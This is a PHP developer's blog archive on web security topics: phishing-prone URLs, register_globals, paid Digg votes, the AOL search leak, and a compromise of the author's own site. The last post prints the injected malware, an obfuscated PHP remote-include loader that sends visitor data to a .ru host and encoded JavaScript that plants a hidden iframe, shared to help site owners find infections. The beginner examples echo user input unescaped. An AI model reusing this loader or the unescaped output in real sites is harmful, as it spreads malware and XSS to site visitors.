Archive for the 'Security' Category

OSCON 2008: SNAP - PHP Taint Tool

Wednesday, July 23rd, 2008

Here are the slides for my talk today at OSCON.

Keep the disclaimer at the start at the front of your mind.

This tool is fragile and not ready to be called alpha quality
It is definitely not ready to be useful on large programs
We will release it under an OSI license … soon

SNAP Presentation (PDF)

Following the big dogs on web application security

Friday, December 21st, 2007

(This post originally appeared as part of the 2007 PHP Advent calendar)

At this time of year people are apt to get all warm and sentimental … Right up until their first trip to a mall on a Saturday when they go back to hating their fellow man and instituting an “If Amazon don’t sell it, you’re not getting it” policy on gift giving. December is very important to retail, and very important to retail sites.

I remember some good advice I read a long time ago. Vincent Flanders & Michael Willis in Web Pages That Suck suggested you “follow the big dogs”, in other words copy Amazon. Their reasoning was sound. You will likely get it wrong on your first try, you can’t afford to run usability studies of your own, and don’t want to spend months and numerous iterations getting it right. Learning from other people’s mistakes is always less embarrassing than learning from your own.

I have had to paraphrase here, because I opted to recycle nearly all my old books rather than ship them half way around the world. Had I wanted to check the accuracy of my quote, it would have cost me one cent to buy a second hand copy of that book.

While the long term relevance of most of the advice in old computer books is fairly accurately reflected by that valuation, it was good advice in 1998. If you were embarking on an ecommerce venture at a time when there was a shortage of people who knew what they were doing, best practice conventions were not settled and innovation was rapid there were worse philosophies you could have than “What Would Amazon Do?”

The same idea is popular today, and for the same reason. There is always a shortage of people who really know what they are doing, so there are plenty of people making decisions by asking “What Would Google/Amazon/Microsoft/eBay/PayPal/Flickr/Yahoo/YouTube/Digg/Facebook Do?” If you are in a space where nobody really knows the best way yet, copying the segment leader is a low risk, low talent shortcut to making mainly good decisions, even if does mean you are always three months behind.

The idea does not apply well to web application security. There are two main reasons for this: first, the big dogs make plenty of mistakes, and second, good security is invisible.

You might notice mistakes, you might read about exploited vulnerabilities and you might notice PR based attempts at the illusion of security, but you probably don’t notice things quietly being done well.

Common big dog mistakes include:

  • Inviting people to click links in email messages.
    You would think that, as one of the most popular phishing targets out there, PayPal would not want to encourage people to click links in emails. Yet, if you sign up for a Paypal account, the confirmation screen requests that you do exactly that.

    Paypal Confirmation Screen

  • Stupid validation rules.
    We all want ways to reject bad data, but it is usually not easy to define hard and fast rules to recognize it, even for data with specific formatting. Everybody wants a simple regex to check email addresses are well formed. Unfortunately, to permit any email that would be valid according to RFC2822, a simple one is not going to cut it. Which means that many, many people add validation that is broken and reject some real addresses. Most are not as stupid as the one AOL used to have for signing up for AIM, which insisted that all email addresses ended in .com, .net, .org, .edu or .mil, but many will reject + and other valid non-alphanumeric characters in the local part of an address (the bit before the @).
  • Stupid censorship systems
    Simple keyword based censorship always annoys people. Eventually, somebody named Woodcock is going to turn up.
    Xbox Live is infamous for rejecting gamertags and mottos after validating them against an extensive list of “inappropriate” words. Going far beyond comedian George Carlin’s notorious Seven Dirty Words, there is a list of about 2700 words that are supposedly banned. By the time you add your regular seven, all possible misspellings thereof, most known euphemisms for body parts, racial epithets, drug related terms, Microsoft brand names, Microsoft competitors’ brand names, terms that sound official and start heading off into foreign languages, you end up catching a lot of innocent phrases.
  • Broken HTML filtering.
    Stripping all HTML from user submitted content and safely displaying the result is often done badly, but is not that difficult. On the other hand, allowing some HTML formatting as user input, but disallowing “dangerous” parts is not an easy problem, especially if you are trying to foster an ecosystem of third party developers.

    The MySpace Samy worm worked not because MySpace failed to filter input, but because of a series of minor cracks that combined allowed arbitrary JavaScript. Once you choose to allow CSS so that users can add what passes for style on MySpace it becomes very hard to limit people to only visual effects.

    eBay has had less well known problems with a similar cause, but without a dramatic replicating worm implementation. Earlier this year scammers were placing large transparent divs over their listings so that any click on the page triggered a mailto or loaded a page of their own. I could not see examples today, so I assume they have fixed the specific vector, but giving users a great deal of freedom to format content that they upload makes ensuring that content is safe for others to view very difficult.

  • Stupidly long urls
    The big dogs love long complicated urls.

          https://chat.bankofamerica.com/hc/LPBofA2/?visitor=&mse
          ssionkey=&cmd=file&file=chatFrame&site=LPBofA2&channel=
          web&d=1185830684250&referrer=%28engage%29%20https%3A//s
          itekey.bankofamerica.com/sas/signon.do%3F%26detect%3D3&
          sessionkey=H6678674785673531985-3590509392420069059K351
          97612

    Having let people get used to that sort of garbage from sites that they should be able to trust, you can’t really be surprised that normal people can’t tell the difference between an XSS attack hidden in URL encoded JavaScript and a real, valid, safe URI. Even abnormal people who can decode a few common URL encodings in their heads are not really scrolling across the hidden nine tenths of the address bar to look at that lot.

  • Looking for simple solutions
    Security is not one simple problem, or even a set of simple problems, so looking for simple solutions such as the proposed .bank TLD is rarely helpful. This is not helped by the vendor-customer nature of much of the computer industry. The idea that you can write a check to somebody and a problem goes away is very compelling - buy a more expensive domain name, or a more expensive Extended Validation Certificate, or run an automated software scan to meet PCI compliance and you might sleep more soundly at night, but many users already don’t understand the URL and other clues that their browser provides them. Giving more subtle clues to them is unlikely to help. Displaying a GIF in the corner of your web page bragging about your safety might create the illusion of security and might well help sales, but it won’t actually help safety on its own.

You can’t follow the public example of the big dogs. They still make some dumb decisions, they still make the small mistakes that allow the CSRF and XSS exploits that are endemic and they are often not very responsive to disclosures. If a major site makes 99 good security decisions and one bad one, you won’t notice the 99. Unfortunately with security you are still far better off seeing how others have been exploited and critically evaluating what they say they should be doing, rather than trying to watch what they actually are doing.

Oh, and remember to stay away from malls on weekends in December.

Short, Clean URIs Are More Secure

Tuesday, July 31st, 2007

There are lots of reasons to use clean, short, readable URIs. Search engines like them. People have some hope of dictating or typing them correctly. Email clients are less likely to mung or truncate them. They give people navigational cues and an extra way to navigate a website. You can even fit them on one billboard (unlike say this one).

One generally ignored advantage is security.

Many phishing, XSS, CSRF and all URI exploits rely at least in part in part on putting stuff the user does not understand in the URI.

Here are a few real URIs from popular websites all found inside a minute within 3 clicks of the home page:

Having let people get used to that sort of garbage from sites that they should be able to trust, you can’t really be surprised that normal people can’t tell the difference between an XSS attack hidden in URL encoded JavaScript and a real, valid, safe URI. Even abnormal people who can decode a few common URL encodings in their heads are not really scrolling across the hidden nine tenths of the address bar to look at that lot.

It won’t help everybody. There are always going to be people who are happy to believe that their bank sends them email from a free address like bank.of.amerika@hotmail.com, and sufficiently sophisticated social engineering is always going to work on some people, some of the time, but the sites that are particularly popular with phishing attacks are making it unnecessarily easy.

If commonly used sites had short, sensible URIs it would not take genius on the part of slightly cynical users to notice that every real bank URI they had seen in the past looked something like https://www.bankofamerica.com/myaccount/login so the 300 character monstrosity full of percent symbols and ampersands that they were being presented with is a little on the fishy side.

Now, go and tidy your room.

I ♥ register_globals

Tuesday, March 13th, 2007

I am aware that there are some things so shocking that you are not supposed to say them in polite company “Hitler had some good ideas”, “Tori Spelling is really pretty” or “I think I look really good in a beret” are all ideas so confronting that they are best kept to yourself regardless of how strongly you believe them.

I have a similarly shocking sentiment that I feel I have to share.

I really like register_globals in PHP.

There, I’ve said it. I can go away and order my I register_globals shirt now.

I (heart) register_globals

Sure, choosing to mingle untrusted user data and internal variables is a bad idea. Sure, if you are too lazy to initialise important variables with a starting value it gives you one extra way to shoot yourself in the foot. Sure, polluting global scope with form variables is going to be a mess in a larger app.

There remains something to be said for simple, elegant, readable ways to shoot yourself in the foot. PHP, like any reasonably complete programming language provides a whole host of other ways, so removing one is not particularly useful.

I used to teach PHP to beginners as a first programming language. I have introduced a few thousand complete novices to programming via PHP.

With register_globals on, this example is a short step from the “Hello World!” example:

<?php
if($name)
{
 echo "Hello $name";
}
else
{
 echo
  '<form>
   Enter your name: <input type="text" name="name">
   <input type="submit">
  </form>';
}
?>

It flows nicely from a “Hello World!” example. It can introduce variables and control structure if you did not provide an even softer introduction to them. It can be turned into an example with a practical use without making the code more complex.

This version may not look very different to you:

<?php
if($_REQUEST['name'])
{
 echo "Hello {$_REQUEST['name']}";
}
else
{
 echo
  '<form>
   Enter your name: <input type="text" name="name">
   <input type="submit">
  </form>';
}
?>

To an experienced eye, the two versions are almost identical. The second requires a little more typing, but nothing to get excited over.

To a complete beginner though, the second is a couple of large leaps away from the first. To understand the second version, somebody has to understand arrays, and PHP string interpolation. Both of these are important topics that they will have to come to in their first few hours of programming, but without register_globals, they stand in the way of even the most trivial dynamic examples.

I miss being able to assume register_globals as default behaviour. It made the initial learning curve far less steep. It made little examples cleaner and more readable. Like most safety measures, it does not really protect people who are determined to get themselves into trouble anyway. People who don’t understand the reasons behind it just run extract() or some code of their own to pull incoming variables out anyway. The user submitted comments in the manual used to be full of sample code for doing exactly that.

Oh, but just a side note to all beret wearing white supremacist Tori spelling fans, just because I am willing to speak up for one unpopular cause does not mean I am interested in yours. Sorry.

Melbourne PHP Users’ Group - March 8th

Wednesday, March 7th, 2007

On Thursday, I will be speaking at PHP Melbourne. My talk is titled PHP Considered Harmful. In case you are wondering though, it does not mean I have had a falling out with PHP. I have spent 10 years talking about what’s great in PHP and I need to vent occasionally. Come along if you are nearby. If not, and I am not strung up by an angry mob, I might redo the talk in another hemisphere later in the year.

The other speaker is Chris Burgess on Building Secure Web Applications.

His blurb:

This presentation expands on a presentation given at the Open Source Developers’ Conference in December 2006 titled “Web Application Security - Tools, Techniques, Tips and Tricks”. I will explore some of the original material for those who were unable to attend, taking a look at the plethora of Open Source tools that can greatly assist developers and testers of web applications. In addition to this, I will discuss techniques that can be used to harden web applications.

Digg’s Kevin Rose Has an Account on User/Submitter?

Saturday, March 3rd, 2007

If you missed it, User/Submitter is a paid service allowing people to buy diggs.

They are very upfront about their business model. Submitters (people who want stories promoted) pay $20 plus $1 per digg. Users (digg users who’s second job as a WoW gold farmer is getting tedious) get paid about 17c per digg. So buying 100 diggs costs $120, and in theory nearly $17 of that gets paid out to diggers, there is a $20 payout minimum, so the chances of many people diligently digging away and making 120 paid diggs before their account gets noticed and shut off seems unlikely. In either case, it is nice profit margin while they can get away with it.

Digg unsurprisingly don’t seem to be fans. Poking around, I can see accounts are being disabled. One of mine got disabled, but that might be a bad example because I was not very subtle. Commenting on stories that I dugg that I had dugg them for 17c is probably more blatant than most. Result:
disabled

Looking at other accounts with suspicious behaviour though I see a few of these:
invalid

Privacy is not particularly well guarded at User/Submitter. If you want to know if a digg user name is registered there, then try to register it. An interesting username to try is kevinrose.

Kevin Rose On User/Submitter

Of course, the experiment is somewhat flawed. You can only check once, and while a negative result is definitive, a positive result might just mean that somebody else performed the same experiment before you. Rumours of Digg’s demise might be popular, but I don’t think Kevin yet needs a side job paying 17c per click.

Suspicious behaviour though is not hard to find. Here are a list of Digg stories that received paid Diggs in the last few hours.
http://digg.com/videos/people/Backflipping_Midget_Chased_by_Cops
http://digg.com/offbeat_news/Russian_wrestling_gone_amazing
http://digg.com/gadgets/The_ULTIMATE_domain_search_tool
http://digg.com/world_news/Photo_essay_Unexploded_bombs_are_everywhere_in_Iraq
http://digg.com/tech_news/Lenovo_Recalls_209_000_Notebook_Batteries
http://digg.com/2008_us_elections/Who_Else_Wants_to_Bash_Bush_Now
http://digg.com/videos/educational/Blind_Turkish_Book_Reviewer_The_Alchemist
http://digg.com/gadgets/Nikon_D40_Review_Good_Camera_at_a_Great_Value

Unsurprisingly, there are a number of the same users digging many of them.

What a social site should do about abuse is a harder problem. Any competitive environment is bound to get people gaming or abusing the system. I am not sure that disabling accounts is the best solution though. If I was a 3rd world subsistence gold farmer sitting in an internet cafe clicking links for a few cents a time and my account got disabled I would just create a new one that needs to be detected and disabled. If my account silently got flagged as a source of worthless diggs, and just ignored in calculations, then I would merrily continue clicking away and over time nearly all bought diggs would be worthless because they would mostly be being paid out to account that have already been detected.

Publicly disabling accounts is good for maintaining the appearance of transparency, but longer term, allowing abusive users individual sandboxes to play in lets them waste time without affecting others. In a system where reregistering under another alias is painless, disabling accounts is not a very effective deterrent.

BombOrNot.com

Wednesday, February 7th, 2007

In the wake of the Boston Aqua Teen Hunger Force bomb scare, I find this site much funnier than previously.

http://www.bombornot.com/

The Utter Stupidity of AOL is Staggering

Monday, August 7th, 2006

OK, that is not news, but I am paraphrasing Techcrunch’s coverage of the AOL Research data release.

For a while, AOL research put data on 20 million web searches by 650000 of their subscribers up for download. The link was fairly quickly taken down, but once information is released it is very hard to take it back. I am sure you can find a mirror or torrent if you look.

Because is it data on a selection of logged in AOL users, it contains a continuous record of their searches over time (March to May 2006). Because you have a record of searches over a period of time, you can start to make some assumptions about the user or the household and depending on the information the user has searched for you can sometimes identify them.

Most Many commenters on Digg don’t seem to see it as a problem, but then maybe their search history does not make it look like they are searching for information on their family tree, information for English teachers in a conservative US state, the website of a local church, chamber of commerce, and rotary chapter in the same state in between searching for MySpace, cheerleaders, preteen sex and strap on sex toys. AOL has kindly replaced these people’s screenname with a sequential integer but I am guessing if you went to that church, Chamber of Commerce, or Rotary chapter you would be able to pick an English teacher with that surname.

Maybe he made all those searches and deserves to be found out. Maybe he shares one internet connection with his son. Maybe his nextdoor neighbour steals his WiFi. In any case, I expect that the free AOL CD he picked up a while ago might have suddenly become pretty expensive.

Building an Asynchronous Multiuser Web App for Fun … and Maybe Profit

Wednesday, July 26th, 2006

Here are the slides for my talk today.

I will put up a cleaner verison of the code in a couple of weeks, but here is today’s verison. It comes with an iron clad guarantee about its bug free status. I just won’t tell you exactly what I am guaranteeing.
poker.pdf
poker_0.1.zip
The mysqldump of the database

Spyware and popups close to home

Monday, February 27th, 2006

It seems somebody, somewhere has a fine sense of irony. A few days ago I posted about a sleezy popup advertising vendor. Then on Sunday morning I looked at my blog to find that it has been altered and code has been inserted in numerous places to force downloads of a (presumably corrupt) WMF file from a website with a .ru extension.

My web host was really, really, remarkably useless, so I am a bit short on details. I think the most likely situation is that an automated script running somewhere on the shared web host was spidering from account to account and inserting its payload into files with .php or .html extensions wherever it found one writable by the webserver user.

There are a few obvious morals to this story.

  • There are scripts in the wild that target PHP sites on shared hosts. Be careful with yours.
  • Have as few files as possible writable by the webserver user on a shared host. I am sure you already knew this, but it can be hard because,
  • Writers of web apps, such as forums and blogs require you to have some files and directories writable, so if you are choosing such software for a shared host see if you can find ones that require as few writable files as possible, and
  • No matter how low your expectations are for the quality of support you expect from a crappy <$10 per month web host, it is always possible for those expectations to be exceeded.

If you have rarely checked stuff sitting on a shared host, it would be worth grepping for some distinctive code from that (perhaps “error_reporting(0)”) to make sure you are not in the same boat.

The whole situation of course serves to make Aussie Hero Dale Begg-Smith all the more lovable in my eyes. For anybody who does not understand why people hate these sort of business practices and the arseclowns that practice them, it is because they make their money at the expense of wasting other people’s time. I spent half of my Sunday cleaning up this mess, and still have a few more domains to fix now (Monday night).

In case anybody is curious, the code generally looked like this:

error_reporting(0);
$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);
$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);
$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);
$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);
$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);
$n=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);
$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".
base64_encode($g).".".base64_encode($h).".".base64_encode($n);
if((include_once(base64_decode("aHR0cDovLw==").
base64_decode("dXNlcjcucGhwaW5jbHVkZS5ydQ==")."/?".$str)))
{}
else {
include_once(base64_decode("aHR0cDovLw==").
base64_decode("dXNlcjcucGhwaW5jbHVkZS5ydQ==")."/?".$str);}

or


<script language="javascript" type="text/javascript">
var k='?gly#vw|oh@%ylvlelolw|=#klgghq>#srvlwlrq=#devroxwh>#ohiw=#4>#wrs=#4%A?liudph#vuf@ %kwws=22xvhu4<1liudph1ux2Bv@4%#iudpherughu@3#yvsdfh@3#kvsdfh@3#zlgwk@4#khljkw@ 4#pdujlqzlgwk@3#pdujlqkhljkw@3#vfuroolqj@qrA?2liudphA?2glyA',t=0,h='';
while(t<=k.length-1){h=h+String.fromCharCode(k.charCodeAt(t++)-3);}

which un-obsfucated is:
<div style="visibility: hidden; position: absolute; left: 1; top: 1"><iframe
src="http://user19.iframe.ru/?s=1" frameborder=0 vspace=0 hspace=0 width=1 height=1
marginwidth=0 marginheight=0 scrolling=no></iframe></div>

In one file I also found:

<a href = "http://mrsnebraskaamerica.com/catalog/images/sierra/hackmai-2.0.shtml" class=giepoaytr title="hackmai 2.0">hackmai 2.0</a>

There were also assorted files with generic sounding names created, like date.php and report.php and .htaccess files created or appended to to direct 404s to the new bogus files.